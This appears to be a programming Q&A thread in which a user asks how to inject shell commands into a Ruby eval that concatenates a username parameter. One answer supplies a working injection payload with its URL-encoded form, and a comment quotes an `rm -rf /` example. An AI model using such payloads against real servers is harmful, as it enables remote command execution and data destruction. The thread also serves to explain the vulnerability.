# Code Execution via Ruby Eval function

Tags: ruby, code-injection

I am trying to perform code execution in ruby eval() by first breaking out of string by injecting ("). The following code is used for injection.

```
myuser"%2B`[system('uname')]`%2B"
```

I am not recieving an error but the command between the backtick is not executing.

I am trying to inject into the username value below.

```
eval "\"Hello "+params['username']+"\""
```

Comment: I don't understand the question. What is `myuser`? What exactly are you running? What result do you get? What are you expecting/hoping for? Can you provide a [mcve] of the problem?

Comment: I am trying inject some code like "system(hostname)" into the username parameter. "myuser" is some random string.

Comment: What's the context for this question? `%2B` means nothing to Ruby. Why is `eval` necessary here?

Comment: What is your questioln?

Comment: @AshwinGopalakrishnan If I understand correctly (??) you're asking "how do I trigger a `system` command via a string interpolation?" ... The answer is **you can't**, as this would be a gigantic security vulnerability if it were possible. (You could just enter `"\`system(rm -rf /)\`"` as the parameter!!!) If you want to trigger a system call, then you need to do this explicitly in the ruby code, and with great caution.

Comment: Running `eval` on arbitrary user input is not a safe way to do this. I'm still not entirely sure what your code is trying to do, since you haven't provided a complete code sample (what is `params['username']`? What is `myuser`? How can I reproduce whatever you're trying to do?), but regardless, calling `eval` on arbitrary input is **never** a good idea.

Answer (score 2):

I'm not 100% sure of your use case, but I can tell you these:

`system` will run a shell command, and return success/failure, but won't save the results:

```
irb(main):001:0> x = system('uname')
Linux
=> true
irb(main):002:0> x
=> true
```

Backticks will run the shell command and save the output, but don't require the word `system`:

```
irb(main):003:0> x = `uname`
=> "Linux\n"
irb(main):004:0> x
=> "Linux\n"
```

(If you include "system" inside the backticks it will run "system" on the command line; usually not what you want)

Backticks alone don't do anything inside strings:

```
irb(main):005:0> "I am `uname`"
=> "I am `uname`"
```

But they will be expanded with `#{}` inside double quotes:

```
irb(main):006:0> "I am #{`uname`}"
=> "I am Linux\n"
```

But it's usually better to run the command first, check for errors, and then add it to the string, like

```
result = `uname`
# Check for errors here
output = "context #{result} more context"
```

Answer (score 1):

```
eval "\"Hello "+params['username']+"\""
```

if this is the ruby code that runs in the server and if you want to perform code-injection , you can use the following payload.

```
myuser"+`uname`+"
```

But you need to URL-Encode the above payload if username param was retrieved via GET request.

Payload after URL-Encoding will be as follows

```
myuser%22%2B%60uname%60%2B%22
```